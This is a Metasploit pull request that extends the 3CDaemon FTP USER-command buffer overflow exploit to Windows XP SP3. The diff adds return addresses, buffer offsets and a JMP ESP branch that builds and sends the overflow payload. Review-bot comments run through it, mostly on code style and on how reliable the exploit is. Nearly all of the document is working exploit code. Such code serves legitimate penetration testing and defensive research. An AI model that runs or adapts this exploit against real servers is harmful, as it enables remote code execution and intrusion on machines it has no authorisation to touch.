
Add Windows SP3 to targets for 3cdaemon FTP #268

Merged
merged 1 commit into from

2 participants: otr, sinn3r

otr:

Using jmp esp instead of seh for sp3

sinn3r wchen-r7 merged commit 30a3d8b into from
Commits on Mar 23, 2012
  1. otr (olliwolli authored): Add Windows SP3 to targets.
Showing with 34 additions and 7 deletions.
  1. +34 −7 modules/exploits/windows/ftp/3cdaemon_ftp_user.rb
@@ -5,8 +5,8 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-# http://metasploit.com/
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
##
require 'msf/core'
@@ -26,7 +26,11 @@ def initialize(info = {})
web site and is recommended in numerous support documents.
This module uses the USER command to trigger the overflow.
},
- 'Author' => [ 'hdm' ],
+ 'Author' =>
+ [
+ 'hdm', # Original author
+ 'otr' # Windows XP SP3
+ ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
@@ -37,6 +41,11 @@ def initialize(info = {})
[ 'BID', '12155'],
[ 'URL', 'ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip'],
],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'seh',
+ 'target' => 0
+ },
'Privileged' => false,
'Payload' =>
{
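Review bot: `'target' => 0` under `DefaultOptions` is the wrong mechanism for choosing the default target; Metasploit modules declare that with a top-level `'DefaultTarget' => 0` beside `'Targets'`, which keeps target selection out of the datastore. Also, `'EXITFUNC' => 'seh'` is now the default for every target, but the new SP3 target added later in this patch returns through a JMP ESP rather than an SEH handler; a short comment saying why the SEH exit technique is still wanted for that target would help the next reader.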
@@ -55,6 +64,7 @@ def initialize(info = {})
{
'Platform' => 'win',
'Ret' => 0x75022ac4, # ws2help.dll
+ 'Offset' => 229,
},
],
[
@@ -62,6 +72,7 @@ def initialize(info = {})
{
'Platform' => 'win',
'Ret' => 0x71aa32ad, # ws2help.dll
+ 'Offset' => 229,
},
],
[
@@ -69,6 +80,7 @@ def initialize(info = {})
{
'Platform' => 'win',
'Ret' => 0x77681799, # ws2help.dll
+ 'Offset' => 229,
},
],
[
@@ -76,9 +88,18 @@ def initialize(info = {})
{
'Platform' => 'win',
'Ret' => 0x775F29D0,
+ 'Offset' => 229,
+ },
+ ],
+ [
+ 'Windows XP English SP3',
+ {
+ 'Platform' => 'win',
+ 'Ret' => 0x7CBD41FB, # 7CBD41FB JMP ESP shell32.data SP3
+ #'Ret' => 0x775C2C1F, # 775C2C1F JMP ESP shell32.data SP1
+ 'Offset' => 245,
},
],
-
],
'DisclosureDate' => 'Jan 4 2005'))
end
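Review bot: the disabled line `#'Ret' => 0x775C2C1F, # 775C2C1F JMP ESP shell32.data SP1` is dead code inside a target named "Windows XP English SP3"; drop it, or if the SP1 address is worth keeping as a reference, put it in a plain comment rather than a commented-out hash key. The live comment `JMP ESP shell32.data SP3` should say what `shell32.data` means (if it is the DLL's .data section, note that the reliability of a gadget in a writable data section is worth confirming, since those bytes are not guaranteed stable). Style: the hex literals `0x7CBD41FB` and `0x775F29D0` are upper case while the other targets use lower case (`0x75022ac4`); pick one form. Removing the stray blank line at the end of the targets array is a good cleanup.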
@@ -97,9 +118,15 @@ def exploit
print_status("Trying target #{target.name}...")
- buf = rand_text_english(2048, payload_badchars)
- seh = generate_seh_payload(target.ret)
- buf[229, seh.length] = seh
+ if (target == targets[4])
+ buf = rand_text_english(target['Offset'], payload_badchars)
+ buf << [ target['Ret'] ].pack('V') * 2
+ buf << payload.encoded
+ else
+ buf = rand_text_english(2048, payload_badchars)
+ seh = generate_seh_payload(target.ret)
+ buf[target['Offset'], seh.length] = seh
+ end
send_cmd( ['USER', buf] , false )
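Review bot: `if (target == targets[4])` keys the JMP ESP path to the array position of the SP3 entry, so adding or reordering a target later silently sends SP3 down the SEH path or an SEH target down the JMP ESP path. Branch on the target hash instead, e.g. give the SP3 target a key such as `'Method' => 'jmpesp'` (name is a suggestion) and test `if target['Method'] == 'jmpesp'`, or at minimum match on `target.name`. Two smaller points: the `* 2` on `[ target['Ret'] ].pack('V')` is unexplained and deserves a comment, and the new branch has no fixed buffer length, unlike the SEH branch's `rand_text_english(2048, ...)`, so confirm the payload `Space` setting keeps the USER argument within what the daemon reads. Replacing the hard-coded `229` with `target['Offset']` in the SEH branch is the right direction; consider `target.ret` vs `target['Ret']` consistency while you are there.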